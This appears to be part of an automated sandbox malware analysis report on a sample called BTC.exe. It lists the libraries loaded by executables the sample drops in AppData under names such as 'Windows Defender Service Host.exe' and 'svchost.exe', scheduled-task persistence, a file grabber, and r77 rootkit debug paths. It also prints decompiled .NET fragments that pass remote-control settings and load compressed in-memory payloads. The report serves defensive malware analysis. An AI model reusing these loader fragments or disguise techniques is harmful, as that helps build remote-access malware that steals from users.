                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: avicap32.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: msvfw32.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: winmm.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Users\user\Desktop\BTC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile written: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\BTC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: BTC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: BTC.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: BTC.exeStatic file information: File size 1159168 > 1048576
                            Source: BTC.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x109e00
                            Source: BTC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: winload_prod.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: winload_prod.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.4.dr, Temp.txt.5.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr
                            Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: Cracked.exe.0.dr, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: Windows Defender Service Host.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Messages.cs.Net Code: Memory
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: svchost.exe.0.drStatic PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F000BD pushad ; iretd 3_2_00007FF848F000C1
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_0523F000 pushad ; ret 4_2_0523F001
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_0523FBF6 pushad ; retf 4_2_0523FBF9
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C1E330 pushad ; retf 4_2_05C1EB31
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C10538 push eax; ret 4_2_05C10545
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C11790 push eax; iretd 4_2_05C1179D
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 6_2_0159954E pushad ; retf 6_2_01599551
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeCode function: 6_2_0159F528 push edx; iretd 6_2_0159F552
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_05034E2A push eax; iretd 16_2_05034E31
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_063742D7 push ebx; ret 16_2_063742DA
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06375E40 push es; ret 16_2_06375E50
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06375F60 push es; ret 16_2_06375F70
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374C70 push es; ret 16_2_06374C80
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374CB0 push es; ret 16_2_06374CC0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374C90 push es; ret 16_2_06374CA0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374CF1 push es; ret 16_2_06374D00
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374CD0 push es; ret 16_2_06374CE0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06376CC2 push es; ret 16_2_06376CD0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06374D10 push es; ret 16_2_06374D20
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06375B80 push es; ret 16_2_06375B90
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeCode function: 16_2_06375860 push es; ret 16_2_06375870
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041C81BB push cs; retf 17_2_041C81CA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041CF1A0 push eax; retf 17_2_041CF1AE
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041C8230 push cs; retf 17_2_041C81CA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041C8243 push cs; retf 17_2_041C81CA
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041CBF3B pushad ; retf 17_2_041CBF5A
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_041C8B59 push cs; retf 17_2_041C8B5E
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 21_2_00007FF848F400BD pushad ; iretd 21_2_00007FF848F400C1
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F329FA push eax; ret 26_2_00007FF848F329FB
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F300BD pushad ; iretd 26_2_00007FF848F300C1
